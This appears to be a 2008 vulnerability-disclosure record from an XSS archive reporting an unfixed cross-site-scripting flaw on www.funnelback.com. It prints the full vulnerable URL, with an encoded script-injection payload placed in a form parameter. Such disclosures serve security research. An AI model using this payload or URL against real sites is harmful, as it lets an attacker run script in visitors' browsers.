Unfixed XSS vulnerability at www.funnelback.com

2008-05-22T00:00:00
ID XSSED:39524
Type xssed
Reporter Venom23
Modified 2008-05-23T00:00:00

Description

Security researcher Venom23, has submitted on 22/05/2008 a cross-site-scripting (XSS) vulnerability affecting www.funnelback.com, which at the time of submission ranked 960178 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 23/05/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.funnelback.com/RFI/apply.cgi?form=RFIForm&x_title=Funnelback%20RFI&x_mandatory=first_name,last_name,email,phone_number,organisation&x_send=title,first_name,last_name,organisation,organisation_type,email,phone_number,comments&first_name=&last_name=%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E%3Cimg%20src=%22%22%20alt=%22&organisation=&email=&phone_number=&comments=&x_action=Submit